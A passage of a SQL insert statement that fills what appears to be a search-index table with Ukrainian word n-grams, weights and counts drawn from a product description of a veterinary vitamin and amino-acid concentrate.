що','запахом що',0,1,1.3333,'з000',1,'*'),(1546543,'запахом що розчиняється','запахом що розчиняється',0,1,1.7667,'з000',1,'*'),(1546544,'засвоюваність','засвоюваність',0,0,0.8667,'з000',1,'*'),(1546545,'засвоюваність кормів','засвоюваність кормів',0,1,1.6667,'з000',1,'*'),(1546546,'засвоюваність кормів яйценоскість','засвоюваність кормів яйценоскість',0,1,2,'з000',1,'*'),(1546547,'застереження','застереження',0,0,0.8,'з000',5,'*'),(1546548,'застереження не','застереження не',0,1,1.5,'з000',3,'*'),(1546549,'застереження не додавати','застереження не додавати',0,1,1.8,'з000',1,'*'),(1546550,'застосовують','застосовують',0,0,0.8,'з000',2,'*'),(1546551,'застосовують для','застосовують для',0,1,1.5333,'з000',2,'*'),(1546552,'застосовують для профілактики','застосовують для профілактики',0,1,1.9667,'з000',1,'*'),(1546553,'застосування нутріфарм','застосування нутріфарм',0,1,1.7333,'з000',1,'*'),(1546554,'застосування нутріфарм застосовують','застосування нутріфарм застосовують',0,1,2,'з000',1,'*'),(1546555,'захворюваннях','захворюваннях',0,0,0.8667,'з000',3,'*'),(1546556,'захворюваннях спричинених','захворюваннях спричинених',0,1,1.8333,'з000',1,'*'),(1546557,'захворюваннях спричинених недостатністю','захворюваннях спричинених недостатністю',0,1,2,'з000',1,'*'),(1546558,'збільшення','збільшення',0,0,0.6667,'з000',1,'*'),(1546559,'збільшення тривалості','збільшення тривалості',0,1,1.7,'з000',1,'*'),(1546560,'збільшення тривалості використання','збільшення тривалості використання',0,1,2,'з000',1,'*'),(1546561,'здоров\'я','здоров',0,0,0.5333,'з000',2,'*'),(1546562,'здоров\'я знижує','здоров знижує',0,1,1.5,'з000',1,'*'),(1546563,'здоров\'я знижує падіж','здоров знижує падіж',0,1,1.7,'з000',1,'*'),(1546564,'зниження','зниження',0,0,0.5333,'з000',1,'*'),(1546565,'зниження впливу','зниження впливу',0,1,1.5,'з000',1,'*'),(1546566,'зниження впливу на','зниження впливу на',0,1,1.6,'з000',1,'*'),(1546567,'знижує','знижує',0,0,0.4,'з000',1,'*'),(1546568,'знижує падіж','знижує падіж',0,1,1.4,'з000',1,'*'),(1546569,'знижує падіж підтримує','знижує падіж підтримує',0,1,1.7333,'з000',1,'*'),(1546570,'зумовлені','зумовлені',0,0,0.6,'з000',1,'*'),(1546571,'зумовлені наявністю','зумовлені наявністю',0,1,1.6333,'з000',1,'*'),(1546572,'зумовлені наявністю вітамінів','зумовлені наявністю вітамінів',0,1,1.9667,'з000',1,'*'),(1546573,'зумовлене','зумовлене',0,0,0.6,'з000',1,'*'),(1546574,'зумовлене процесом','зумовлене процесом',0,1,1.6,'з000',1,'*'),(1546575,'зумовлене процесом окислення','зумовлене процесом окислення',0,1,1.9333,'з000',1,'*'),(1546576,'його здоров\'я','його здоров',0,1,1.4333,'й000',1,'*'),(1546577,'його здоров\'я знижує','його здоров знижує',0,1,1.6667,'й000',1,'*'),(1546578,'його складу','його складу',0,1,1.3667,'й000',1,'*'),(1546579,'його складу вітаміни','його складу вітаміни',0,1,1.6667,'й000',1,'*'),(1546580,'к3 менадіон','к3 менадіон',0,1,1.3667,'к000',1,'*'),(1546581,'к3 менадіон 1750','к3 менадіон 1750',0,1,1.5333,'к000',1,'*'),(1546582,'каталізаторів','каталізаторів',0,0,0.8667,'к000',1,'*'),(1546583,'каталізаторів в','каталізаторів в',0,1,1.5,'к000',1,'*'),(1546584,'каталізаторів в організмі','каталізаторів в організмі',0,1,1.8333,'к000',1,'*'),(1546585,'кг порошка','кг порошка',0,1,1.3333,'к000',1,'*'),(1546586,'кг порошка містить','кг порошка містить',0,1,1.6,'к000',1,'*'),(1546587,'кислота 18','кислота 18',0,1,1.3333,'к000',1,'*'),(1546588,'кислота 18 000','кислота 18 000',0,1,1.4667,'к000',1,'*'),(1546589,'кислота 20','кислота 20',0,1,1.3333,'к000',1,'*'),(1546590,'кислота 20 000','кислота 20 000',0,1,1.4667,'к000',1,'*'),(1546591,'кислота 400','кислота 400',0,1,1.3667,'к000',1,'*'),(1546592,'кислота 400 мг','кислота 400 мг',0,1,1.4667,'к000',1,'*'),(1546593,'кислота 6000','кислота 6000',0,1,1.4,'к000',1,'*'),(1546594,'кислота 6000 мг','кислота 6000 мг',0,1,1.5,'к000',1,'*'),(1546595,'клітин','клітин',0,0,0.4,'к000',1,'*'),(1546596,'клітин в','клітин в',0,1,1.2667,'к000',1,'*'),(1546597,'клітин в організмі','клітин в організмі',0,1,1.6,'к000',1,'*'),(1546598,'клітин зумовлене','клітин зумовлене',0,1,1.5333,'к000',1,'*'),(1546599,'клітин зумовлене процесом','клітин зумовлене процесом',0,1,1.8333,'к000',1,'*'),(1546600,'кожного','кожного',0,0,0.4667,'к000',3,'*'),(1546601,'кожного дня','кожного дня',0,1,1.3667,'к000',1,'*'),(1546602,'кожного дня суміш','кожного дня суміш',0,1,1.5667,'к000',1,'*'),(1546603,'козлятам','козлятам',0,0,0.5333,'к000',1,'*'),(1546604,'козлятам 0,5-0,8','козлятам 0,5-0,8',0,1,1.5333,'к000',1,'*'),(1546605,'козлятам 0,5-0,8 г','козлятам 0,5-0,8 г',0,1,1.6,'к000',1,'*'),(1546606,'комплекс нутріфарм','комплекс нутріфарм',0,1,1.6,'к000',1,'*'),(1546607,'концентрат','концентрат',0,0,0.6667,'к000',1,'*'),(1546608,'концентрат активізує','концентрат активізує',0,1,1.6667,'к000',1,'*'),(1546609,'концентрат активізує окисно-відновні','концентрат активізує окисно-відновні',0,1,2,'к000',1,'*'),(1546610,'концентрат в','концентрат в',0,1,1.4,'к000',1,'*'),(1546611,'концентрат в зазначених','концентрат в зазначених',0,1,1.7667,'к000',1,'*'),(1546612,'концентрат у','концентрат у',0,1,1.4,'к000',1,'*'),(1546613,'концентрат у питній','концентрат у питній',0,1,1.6333,'к000',1,'*'),(1546614,'концентрату','концентрату',0,0,0.7333,'к000',1,'*'),(1546615,'концентрату зумовлені','концентрату зумовлені',0,1,1.7,'к000',1,'*'),(1546616,'концентрату зумовлені наявністю','концентрату зумовлені наявністю',0,1,2,'к000',1,'*'),(1546617,'корм','корм',0,0,0.2667,'к000',1,'*'),(1546618,'корм форма','корм форма',0,1,1.3333,'к000',1,'*'),(1546619,'корм форма випуску','корм форма випуску',0,1,1.6,'к000',1,'*'),(1546620,'кормів','кормів',0,0,0.4,'к000',1,'*'),(1546621,'кормів підвищення','кормів підвищення',0,1,1.5667,'к000',1,'*'),(1546622,'кормів підвищення статевої','кормів підвищення статевої',0,1,1.8667,'к000',1,'*'),(1546623,'кормів яйценоскість','кормів яйценоскість',0,1,1.6333,'к000',1,'*'),(1546624,'кормів яйценоскість нормалізує','кормів яйценоскість нормалізує',0,1,2,'к000',1,'*'),(1546625,'кормах','кормах',0,0,0.4,'к000',1,'*'),(1546626,'кормах для','кормах для',0,1,1.3333,'к000',1,'*'),(1546627,'кормах для стимуляції','кормах для стимуляції',0,1,1.7,'к000',1,'*'),(1546628,'кормах міститься','кормах міститься',0,1,1.5333,'к000',1,'*'),(1546629,'кормах міститься надлишок','кормах міститься надлишок',0,1,1.8333,'к000',1,'*'),(1546630,'кормом','кормом',0,0,0.4,'к000',3,'*'),(1546631,'кормом можна','кормом можна',0,1,1.4,'к000',1,'*'),(1546632,'кормом можна підготувати','кормом можна підготувати',0,1,1.8,'к000',1,'*'),(1546633,'кормом та','кормом та',0,1,1.3,'к000',1,'*'),(1546634,'кормом та задають','кормом та задають',0,1,1.5667,'к000',1,'*'),(1546635,'кормом у','кормом у',0,1,1.2667,'к000',1,'*'),(1546636,'кормом у дозах','кормом у дозах',0,1,1.4667,'к000',1,'*'),(1546637,'кровотворення','кровотворення',0,0,0.8667,'к000',1,'*'),(1546638,'кровотворення підвищує','кровотворення підвищує',0,1,1.7333,'к000',1,'*'),(1546639,'кровотворення підвищує засвоюваність','кровотворення підвищує засвоюваність',0,1,2,'к000',1,'*'),(1546640,'курей','курей',0,0,0.3333,'к000',1,'*'),(1546641,'курей 20','курей 20',0,1,1.2667,'к000',1,'*'),(1546642,'курей 20 бройлерів','курей 20 бройлерів',0,1,1.6,'к000',1,'*'),(1546643,'курчат','курчат',0,0,0.4,'к000',2,'*'),(1546644,'курчат 5','курчат 5',0,1,1.2667,'к000',1,'*'),(1546645,'курчат 5 індиків','курчат 5 індиків',0,1,1.5333,'к000',1,'*'),(1546646,'л питної','л питної',0,1,1.2667,'л000',2,'*'),(1546647,'л питної води','л питної води',0,1,1.4333,'л000',2,'*'),(1546648,'лізин','лізин',0,0,0.3333,'л000',1,'*'),(1546649,'лізин 4000','лізин 4000',0,1,1.3333,'л000',1,'*'),(1546650,'лізин 4000 мг','лізин 4000 мг',0,1,1.4333,'л000',1,'*'),(1546651,'лікувальною','лікувальною',0,0,0.7333,'л000',1,'*'),(1546652,'лікувальною протягом','лікувальною протягом',0,1,1.6667,'л000',1,'*'),(1546653,'лікувальною протягом 5-10','лікувальною протягом 5-10',0,1,1.8333,'л000',1,'*'),(1546654,'лікування гіповітамінозів','лікування гіповітамінозів',0,1,1.8333,'л000',1,'*'),(1546655,'лікування гіповітамінозів зниження','лікування гіповітамінозів зниження',0,1,2,'л000',1,'*'),(1546656,'лактозу','лактозу',0,0,0.4667,'л000',1,'*'),(1546657,'лактозу фармакологiчнi','лактозу фармакологiчнi',0,1,1.7333,'л000',1,'*'),(1546658,'лактозу фармакологiчнi властивостi','лактозу фармакологiчнi властивостi',0,1,2,'л000',1,'*'),(1546659,'лошатам','лошатам',0,0,0.4667,'л000',1,'*'),(1546660,'лошатам 2-3','лошатам 2-3',0,1,1.3667,'л000',1,'*'),(1546661,'лошатам 2-3 г','лошатам 2-3 г',0,1,1.4333,'л000',1,'*'),(1546662,'містить вітамін','містить вітамін',0,1,1.5,'м000',1,'*'),(1546663,'містить вітамін а','містить вітамін а',0,1,1.5667,'м000',1,'*'),(1546664,'міститься','міститься',0,0,0.6,'м000',1,'*'),(1546665,'міститься надлишок','міститься надлишок',0,1,1.6,'м000',1,'*'),(1546666,'міститься надлишок селену','міститься надлишок селену',0,1,1.8333,'м000',1,'*'),(1546667,'місцевостях','місцевостях',0,0,0.7333,'м000',1,'*'),(1546668,'місцевостях де','місцевостях де',0,1,1.4667,'м000',1,'*'),(1546669,'місцевостях де в','місцевостях де в',0,1,1.5333,'м000',1,'*'),(1546670,'місяці','місяці',0,0,0.4,'м000',4,'*'),(1546671,'місяці 0,4-0,8','місяці 0,4-0,8',0,1,1.4667,'м000',1,'*'),(1546672,'місяці 0,4-0,8 г','місяці 0,4-0,8 г',0,1,1.5333,'м000',1,'*'),(1546673,'маточного','маточного',0,0,0.6,'м000',1,'*'),(1546674,'маточного поголів\'я','маточного поголів',0,1,1.6333,'м000',1,'*'),(1546675,'маточного поголів\'я дозування','маточного поголів дозування',0,1,1.9667,'м000',1,'*'),(1546676,'мг вітамін в3','мг вітамін в3',0,1,1.4333,'м000',1,'*'),(1546677,'мг вітамін в5','мг вітамін в5',0,1,1.4333,'м000',1,'*'),(1546678,'мг вітамін в9','мг вітамін в9',0,1,1.4333,'м000',1,'*'),(1546679,'мг лізин','мг лізин',0,1,1.2667,'м000',1,'*'),(1546680,'мг лізин 4000','мг лізин 4000',0,1,1.4333,'м000',1,'*'),(1546681,'мг лактозу','мг лактозу',0,1,1.3333,'м000',1,'*'),(1546682,'мг лактозу фармакологiчнi','мг лактозу фармакологiчнi',0,1,1.8333,'м000',1,'*'),(1546683,'мг метіонін','мг метіонін',0,1,1.3667,'м000',1,'*'),(1546684,'мг метіонін 4000','мг метіонін 4000',0,1,1.5333,'м000',1,'*'),(1546685,'мг селен','мг селен',0,1,1.2667,'м000',1,'*'),(1546686,'мг селен 33','мг селен 33',0,1,1.3667,'м000',1,'*'),(1546687,'мг триптофан','мг триптофан',0,1,1.4,'м000',1,'*'),(1546688,'мг триптофан 600','мг триптофан 600',0,1,1.5333,'м000',1,'*'),(1546689,'менадіон','менадіон',0,0,0.5333,'м000',1,'*'),(1546690,'менадіон 1750','менадіон 1750',0,1,1.4333,'м000',1,'*'),(1546691,'менадіон 1750 мг','менадіон 1750 мг',0,1,1.5333,'м000',1,'*'),(1546692,'метіонін','метіонін',0,0,0.5333,'м000',1,'*'),(1546693,'метіонін 4000','метіонін 4000',0,1,1.4333,'м000',1,'*'),(1546694,'метіонін 4000 мг','метіонін 4000 мг',0,1,1.5333,'м000',1,'*'),(1546695,'метаболізмі','метаболізмі',0,0,0.7333,'м000',1,'*'),(1546696,'метаболізмі тиреоїдних','метаболізмі тиреоїдних',0,1,1.7333,'м000',1,'*'),(1546697,'метаболізмі тиреоїдних гормонів','метаболізмі тиреоїдних гормонів',0,1,2,'м000',1,'*'),(1546698,'метаболізму','метаболізму',0,0,0.7333,'м000',1,'*'),(1546699,'метаболізму в','метаболізму в',0,1,1.4333,'м000',1,'*'),(1546700,'метаболізму в печінці','метаболізму в печінці',0,1,1.7,'м000',1,'*'),(1546701,'метою','метою',0,0,0.3333,'м000',3,'*'),(1546702,'метою протягом','метою протягом',0,1,1.4667,'м000',1,'*'),(1546703,'метою протягом 3-7','метою протягом 3-7',0,1,1.6,'м000',1,'*'),(1546704,'можна','можна',0,0,0.3333,'м000',11,'*'),(1546705,'можна підготувати','можна підготувати',0,1,1.5667,'м000',1,'*'),(1546706,'можна підготувати заздалегідь','можна підготувати заздалегідь',0,1,1.9667,'м000',1,'*'),(1546707,'молодняка та','молодняка та',0,1,1.4,'м000',1,'*'),(1546708,'молодняка та покращення','молодняка та покращення',0,1,1.7667,'м000',1,'*'),(1546709,'нікотинова кислота 18','нікотинова кислота 18',0,1,1.7,'н000',1,'*'),(1546710,'на 2','на 2',0,1,1.1333,'н000',1,'*'),(1546711,'на 2 л','на 2 л',0,1,1.2,'н000',1,'*'),(1546712,'на високому','на високому',0,1,1.3667,'н000',1,'*'),(1546713,'на високому рівні','на високому рівні',0,1,1.5667,'н000',1,'*'),(1546714,'на голову','на голову',0,1,1.3,'н000',1,'*'),(1546715,'на голову концентрат','на голову концентрат',0,1,1.6667,'н000',1,'*'),(1546716,'на голову телятам','на голову телятам',0,1,1.5667,'н000',1,'*'),(1546717,'на голову хрякам','на голову хрякам',0,1,1.5333,'н000',1,'*'),(1546718,'на голову ягнятам','на голову ягнятам',0,1,1.5667,'н000',1,'*'),(1546719,'на організм','на організм',0,1,1.3667,'н000',1,'*'),(1546720,'на організм тварин','на організм тварин',0,1,1.6,'н000',1,'*'),(1546721,'навколишнього','навколишнього',0,0,0.8667,'н000',1,'*'),(1546722,'навколишнього середовища','навколишнього середовища',0,1,1.8,'н000',1,'*'),(1546723,'навколишнього середовища та','навколишнього середовища та',0,1,1.9,'н000',1,'*'),(1546724,'надлишок','надлишок',0,0,0.5333,'н000',1,'*'),(1546725,'надлишок селену','надлишок селену',0,1,1.5,'н000',1,'*'),(1546726,'надлишок селену застереження','надлишок селену застереження',0,1,1.9333,'н000',1,'*'),(1546727,'наявністю','наявністю',0,0,0.6,'н000',1,'*'),(1546728,'наявністю вітамінів','наявністю вітамінів',0,1,1.6333,'н000',1,'*'),(1546729,'наявністю вітамінів амінокислот','наявністю вітамінів амінокислот',0,1,2,'н000',1,'*'),(1546730,'не використовувати','не використовувати',0,1,1.6,'н000',2,'*'),(1546731,'не використовувати в','не використовувати в',0,1,1.6667,'н000',1,'*'),(1546732,'не вище','не вище',0,1,1.2333,'н000',1,'*'),(1546733,'не вище 25','не вище 25',0,1,1.3333,'н000',1,'*'),(1546734,'не додавати','не додавати',0,1,1.3667,'н000',1,'*'),(1546735,'не додавати у','не додавати у',0,1,1.4333,'н000',1,'*'),(1546736,'недостатністю','недостатністю',0,0,0.8667,'н000',1,'*'),(1546737,'недостатністю селену','недостатністю селену',0,1,1.6667,'н000',1,'*'),(1546738,'недостатністю селену і','недостатністю селену і',0,1,1.7333,'н000',1,'*'),(1546739,'недоступному','недоступному',0,0,0.8,'н000',1,'*'),(1546740,'недоступному для','недоступному для',0,1,1.5333,'н000',1,'*'),(1546741,'недоступному для дітей','недоступному для дітей',0,1,1.7333,'н000',1,'*'),(1546742,'незамінні','незамінні',0,0,0.6,'н000',1,'*'),(1546743,'незамінні амінокислоти','незамінні амінокислоти',0,1,1.7333,'н000',1,'*'),(1546744,'незамінні амінокислоти необхідні','незамінні амінокислоти необхідні',0,1,2,'н000',1,'*'),(1546745,'необхідні','необхідні',0,0,0.6,'н000',1,'*'),(1546746,'необхідні для','необхідні для',0,1,1.4333,'н000',1,'*'),(1546747,'необхідні для росту','необхідні для росту',0,1,1.6333,'н000',1,'*'),(1546748,'необхідні для синтезу','необхідні для синтезу',0,1,1.7,'н000',1,'*'),(1546749,'несприятливих','несприятливих',0,0,0.8667,'н000',1,'*'),(1546750,'несприятливих факторів','несприятливих факторів',0,1,1.7333,'н000',1,'*'),(1546751,'несприятливих факторів навколишнього','несприятливих факторів навколишнього',0,1,2,'н000',1,'*'),(1546752,'нормалізує','нормалізує',0,0,0.6667,'н000',1,'*'),(1546753,'нормалізує обмін','нормалізує обмін',0,1,1.5333,'н000',1,'*'),(1546754,'нормалізує обмін речовин','нормалізує обмін речовин',0,1,1.8,'н000',1,'*'),(1546755,'нутріфарм','нутріфарм',0,0,0.6,'н000',1,'*'),(1546756,'нутріфарм застосовують','нутріфарм застосовують',0,1,1.7333,'н000',1,'*'),(1546757,'нутріфарм застосовують для','нутріфарм застосовують для',0,1,1.8667,'н000',1,'*'),(1546758,'обмін','обмін',0,0,0.3333,'о000',2,'*'),(1546759,'обмін речовин','обмін речовин',0,1,1.4333,'о000',1,'*'),(1546760,'обмін речовин забезпечує','обмін речовин забезпечує',0,1,1.8,'о000',1,'*'),(1546761,'однорідний','однорідний',0,0,0.6667,'о000',1,'*'),(1546762,'однорідний сипучий','однорідний сипучий',0,1,1.6,'о000',1,'*'),(1546763,'однорідний сипучий порошок','однорідний сипучий порошок',0,1,1.8667,'о000',1,'*'),(1546764,'окислення','окислення',0,0,0.6,'о000',1,'*'),(1546765,'окислення концентрат','окислення концентрат',0,1,1.6667,'о000',1,'*'),(1546766,'окислення концентрат активізує','окислення концентрат активізує',0,1,2,'о000',1,'*'),(1546767,'окисно-відновні','окисно-відновні',0,0,1,'о000',1,'*'),(1546768,'окисно-відновні реакції','окисно-відновні реакції',0,1,1.7667,'о000',1,'*'),(1546769,'окисно-відновні реакції процеси','окисно-відновні реакції процеси',0,1,2,'о000',1,'*'),(1546770,'опис однорідний','опис однорідний',0,1,1.5,'о000',1,'*'),(1546771,'опис однорідний сипучий','опис однорідний сипучий',0,1,1.7667,'о000',1,'*'),(1546772,'організм','організм',0,0,0.5333,'о000',1,'*'),(1546773,'організм тварин','організм тварин',0,1,1.5,'о000',1,'*'),(1546774,'організм тварин і','організм тварин і',0,1,1.5667,'о000',1,'*'),(1546775,'організмі','організмі',0,0,0.6,'о000',1,'*'),(1546776,'організмі тварин','організмі тварин',0,1,1.5333,'о000',1,'*'),(1546777,'організмі тварин незамінні','організмі тварин незамінні',0,1,1.8667,'о000',1,'*'),(1546778,'організмі факторрозвитку','організмі факторрозвитку',0,1,1.8,'о000',1,'*'),(1546779,'організмі факторрозвитку підвищує','організмі факторрозвитку підвищує',0,1,2,'о000',1,'*'),(1546780,'організму','організму',0,0,0.6,'о000',2,'*'),(1546781,'організму до','організму до',0,1,1.4,'о000',1,'*'),(1546782,'організму до несприятливих','організму до несприятливих',0,1,1.8667,'о000',1,'*'),(1546783,'під','під',0,0,0.2,'п000',4,'*'),(1546784,'під час','під час',0,1,1.2333,'п000',3,'*'),(1546785,'під час вакцинації','під час вакцинації',0,1,1.6,'п000',1,'*'),(1546786,'підвищення','підвищення',0,0,0.6667,'п000',3,'*'),(1546787,'підвищення продуктивності','підвищення продуктивності',0,1,1.8333,'п000',1,'*'),(1546788,'підвищення продуктивності і','підвищення продуктивності і',0,1,1.9,'п000',1,'*'),(1546789,'підвищення статевої','підвищення статевої',0,1,1.6333,'п000',1,'*'),(1546790,'підвищення статевої активності','підвищення статевої активності',0,1,2,'п000',1,'*'),(1546791,'підвищує','підвищує',0,0,0.5333,'п000',1,'*'),(1546792,'підвищує засвоюваність','підвищує засвоюваність',0,1,1.7333,'п000',1,'*'),(1546793,'підвищує засвоюваність кормів','підвищує засвоюваність кормів',0,1,1.9667,'п000',1,'*'),(1546794,'підвищує резистентність','підвищує резистентність',0,1,1.7667,'п000',1,'*'),(1546795,'підвищує резистентність організму','підвищує резистентність організму',0,1,2,'п000',1,'*'),(1546796,'підготувати','підготувати',0,0,0.7333,'п000',1,'*'),(1546797,'підготувати заздалегідь','підготувати заздалегідь',0,1,1.7667,'п000',1,'*'),(1546798,'підготувати заздалегідь та','підготувати заздалегідь та',0,1,1.8667,'п000',1,'*'),(1546799,'підтримує','підтримує',0,0,0.6,'п000',1,'*'),(1546800,'підтримує продуктивність','підтримує продуктивність',0,1,1.8,'п000',1,'*'),(1546801,'підтримує продуктивність сількогосподарських','підтримує продуктивність сількогосподарських',0,1,2,'п000',1,'*'),(1546802,'піридоксин','піридоксин',0,0,0.6667,'п000',1,'*'),(1546803,'піридоксин 2000','піридоксин 2000',0,1,1.5,'п000',1,'*'),(1546804,'піридоксин 2000 мг','піридоксин 2000 мг',0,1,1.6,'п000',1,'*'),(1546805,'падіж','падіж',0,0,0.3333,'п000',1,'*'),(1546806,'падіж підтримує','падіж підтримує',0,1,1.5,'п000',1,'*'),(1546807,'падіж підтримує продуктивність','падіж підтримує продуктивність',0,1,2,'п000',1,'*'),(1546808,'пакети по 1','пакети по 1',0,1,1.3667,'п000',1,'*'),(1546809,'пантотенова','пантотенова',0,0,0.7333,'п000',1,'*'),(1546810,'пантотенова кислота','пантотенова кислота',0,1,1.6333,'п000',1,'*'),(1546811,'пантотенова кислота 6000','пантотенова кислота 6000',0,1,1.8,'п000',1,'*'),(1546812,'перорально','перорально',0,0,0.6667,'п000',4,'*'),(1546813,'перорально з','перорально з',0,1,1.4,'п000',1,'*'),(1546814,'перорально з питною','перорально з питною',0,1,1.6333,'п000',1,'*'),(1546815,'печінці','печінці',0,0,0.4667,'п000',1,'*'),(1546816,'печінці при','печінці при',0,1,1.3667,'п000',1,'*'),(1546817,'печінці при захворюваннях','печінці при захворюваннях',0,1,1.8333,'п000',1,'*'),(1546818,'питній','питній',0,0,0.4,'п000',1,'*'),(1546819,'питній воді','питній воді',0,1,1.3667,'п000',1,'*'),(1546820,'питній воді у','питній воді у',0,1,1.4333,'п000',1,'*'),(1546821,'питної','питної',0,0,0.4,'п000',2,'*'),(1546822,'питної води','питної води',0,1,1.3667,'п000',2,'*'),(1546823,'питної води і','питної води і',0,1,1.4333,'п000',1,'*'),(1546824,'питною','питною',0,0,0.4,'п000',2,'*'),(1546825,'питною водою','питною водою',0,1,1.4,'п000',2,'*'),(1546826,'питною водою або','питною водою або',0,1,1.5333,'п000',2,'*'),(1546827,'пластикові','пластикові',0,0,0.6667,'п000',2,'*'),(1546828,'пластикові пакети','пластикові пакети',0,1,1.5667,'п000',1,'*'),(1546829,'пластикові пакети по','пластикові пакети по',0,1,1.6667,'п000',1,'*'),(1546830,'по 1','по 1',0,1,1.1333,'п000',2,'*'),(1546831,'по 1 3','по 1 3',0,1,1.2,'п000',1,'*'),(1546832,'поголів\'я','поголів',0,0,0.6,'п000',1,'*'),(1546833,'поголів\'я дозування','поголів дозування',0,1,1.6333,'п000',1,'*'),(1546834,'поголів\'я дозування перорально','поголів дозування перорально',0,1,2,'п000',1,'*'),(1546835,'покращення','покращення',0,0,0.6667,'п000',2,'*'),(1546836,'покращення стану','покращення стану',0,1,1.5333,'п000',1,'*'),(1546837,'покращення стану його','покращення стану його',0,1,1.7,'п000',1,'*'),(1546838,'попереджує','попереджує',0,0,0.6667,'п000',1,'*'),(1546839,'попереджує пошкодження','попереджує пошкодження',0,1,1.7333,'п000',1,'*'),(1546840,'попереджує пошкодження клітин','попереджує пошкодження клітин',0,1,1.9667,'п000',1,'*'),(1546841,'поросятам','поросятам',0,0,0.6,'п000',1,'*'),(1546842,'поросятам віком','поросятам віком',0,1,1.5,'п000',1,'*'),(1546843,'поросятам віком 2-4','поросятам віком 2-4',0,1,1.6333,'п000',1,'*'),(1546844,'порошка','порошка',0,0,0.4667,'п000',1,'*'),(1546845,'порошка містить','порошка містить',0,1,1.5,'п000',1,'*'),(1546846,'порошка містить вітамін','порошка містить вітамін',0,1,1.7667,'п000',1,'*'),(1546847,'порошок від','порошок від',0,1,1.3667,'п000',1,'*'),(1546848,'порошок від жовтого','порошок від жовтого',0,1,1.6333,'п000',1,'*'),(1546849,'порушеннях','порушеннях',0,0,0.6667,'п000',1,'*'),(1546850,'порушеннях метаболізму','порушеннях метаболізму',0,1,1.7333,'п000',1,'*'),(1546851,'порушеннях метаболізму в','порушеннях метаболізму в',0,1,1.8,'п000',1,'*'),(1546852,'походження','походження',0,0,0.6667,'п000',1,'*'),(1546853,'походження при','походження при',0,1,1.4667,'п000',1,'*'),(1546854,'походження при порушеннях','походження при порушеннях',0,1,1.8333,'п000',1,'*'),(1546855,'пошкодження','пошкодження',0,0,0.7333,'п000',1,'*'),(1546856,'пошкодження клітин','пошкодження клітин',0,1,1.6,'п000',1,'*'),(1546857,'пошкодження клітин зумовлене','пошкодження клітин зумовлене',0,1,1.9333,'п000',1,'*'),(1546858,'при захворюваннях','при захворюваннях',0,1,1.5667,'п000',3,'*'),(1546859,'при захворюваннях спричинених','при захворюваннях спричинених',0,1,1.9667,'п000',1,'*'),(1546860,'при порушеннях','при порушеннях',0,1,1.4667,'п000',1,'*'),(1546861,'при порушеннях метаболізму','при порушеннях метаболізму',0,1,1.8667,'п000',1,'*'),(1546862,'при стресових','при стресових',0,1,1.4333,'п000',1,'*'),(1546863,'при стресових ситуаціях','при стресових ситуаціях',0,1,1.7667,'п000',1,'*'),(1546864,'при температурі не','при температурі не',0,1,1.6,'п000',1,'*'),(1546865,'приготовлений','приготовлений',0,0,0.8667,'п000',1,'*'),(1546866,'приготовлений розчин','приготовлений розчин',0,1,1.6667,'п000',1,'*'),(1546867,'приготовлений розчин придатний','приготовлений розчин придатний',0,1,2,'п000',1,'*'),(1546868,'придатний','придатний',0,0,0.6,'п000',1,'*'),(1546869,'придатний протягом','придатний протягом',0,1,1.6,'п000',1,'*'),(1546870,'придатний протягом доби','придатний протягом доби',0,1,1.7667,'п000',1,'*'),(1546871,'продуктивність','продуктивність',0,0,0.9333,'п000',1,'*'),(1546872,'продуктивність сількогосподарських','продуктивність сількогосподарських',0,1,2,'п000',1,'*'),(1546873,'продуктивність сількогосподарських тварин','продуктивність сількогосподарських тварин',0,1,2,'п000',1,'*'),(1546874,'продуктивності','продуктивності',0,0,0.9333,'п000',1,'*'),(1546875,'продуктивності і','продуктивності і',0,1,1.5333,'п000',1,'*'),(1546876,'продуктивності і ефективності','продуктивності і ефективності',0,1,1.9667,'п000',1,'*'),(1546877,'протипоказання не використовувати','протипоказання не використовувати',0,1,2,'п000',1,'*'),(1546878,'протягом 3-7','протягом 3-7',0,1,1.4,'п000',1,'*'),(1546879,'протягом 3-7 днів','протягом 3-7 днів',0,1,1.5667,'п000',1,'*'),(1546880,'протягом 5-10','протягом 5-10',0,1,1.4333,'п000',1,'*'),(1546881,'протягом 5-10 днів','протягом 5-10 днів',0,1,1.6,'п000',1,'*'),(1546882,'протягом доби','протягом доби',0,1,1.4333,'п000',1,'*'),(1546883,'протягом доби виробник','протягом доби виробник',0,1,1.7333,'п000',1,'*'),(1546884,'протягом доби розчин','протягом доби розчин',0,1,1.6667,'п000',1,'*'),(1546885,'протягом доби що','протягом доби що',0,1,1.5333,'п000',1,'*'),(1546886,'профілактичною','профілактичною',0,0,0.9333,'п000',1,'*'),(1546887,'профілактичною метою','профілактичною метою',0,1,1.6667,'п000',1,'*'),(1546888,'профілактичною метою протягом','профілактичною метою протягом',0,1,1.9667,'п000',1,'*'),(1546889,'процеси','процеси',0,0,0.4667,'п000',1,'*'),(1546890,'процеси кровотворення','процеси кровотворення',0,1,1.7,'п000',1,'*'),(1546891,'процеси кровотворення підвищує','процеси кровотворення підвищує',0,1,2,'п000',1,'*'),(1546892,'процесом','процесом',0,0,0.5333,'п000',1,'*'),(1546893,'процесом окислення','процесом окислення',0,1,1.6,'п000',1,'*'),(1546894,'процесом окислення концентрат','процесом окислення концентрат',0,1,1.9667,'п000',1,'*'),(1546895,'птиці на','птиці на',0,1,1.2667,'п000',1,'*'),(1546896,'птиці на високому','птиці на високому',0,1,1.5667,'п000',1,'*'),(1546897,'птиці розчин','птиці розчин',0,1,1.4,'п000',1,'*'),(1546898,'птиці розчин задаютьгруповим','птиці розчин задаютьгруповим',0,1,1.9333,'п000',1,'*'),(1546899,'птиці стрес-факторів','птиці стрес-факторів',0,1,1.6667,'п000',1,'*'),(1546900,'птиці стрес-факторів різного','птиці стрес-факторів різного',0,1,1.9333,'п000',1,'*'),(1546901,'рівні','рівні',0,0,0.3333,'р000',1,'*'),(1546902,'рівні при','рівні при',0,1,1.3,'р000',1,'*'),(1546903,'рівні при стресових','рівні при стресових',0,1,1.6333,'р000',1,'*'),(1546904,'різного','різного',0,0,0.4667,'р000',1,'*'),(1546905,'різного походження','різного походження',0,1,1.6,'р000',1,'*'),(1546906,'різного походження при','різного походження при',0,1,1.7333,'р000',1,'*'),(1546907,'реакції','реакції',0,0,0.4667,'р000',1,'*'),(1546908,'реакції процеси','реакції процеси',0,1,1.5,'р000',1,'*'),(1546909,'реакції процеси кровотворення','реакції процеси кровотворення',0,1,1.9667,'р000',1,'*'),(1546910,'резистентність','резистентність',0,0,0.9333,'р000',1,'*'),(1546911,'резистентність організму','резистентність 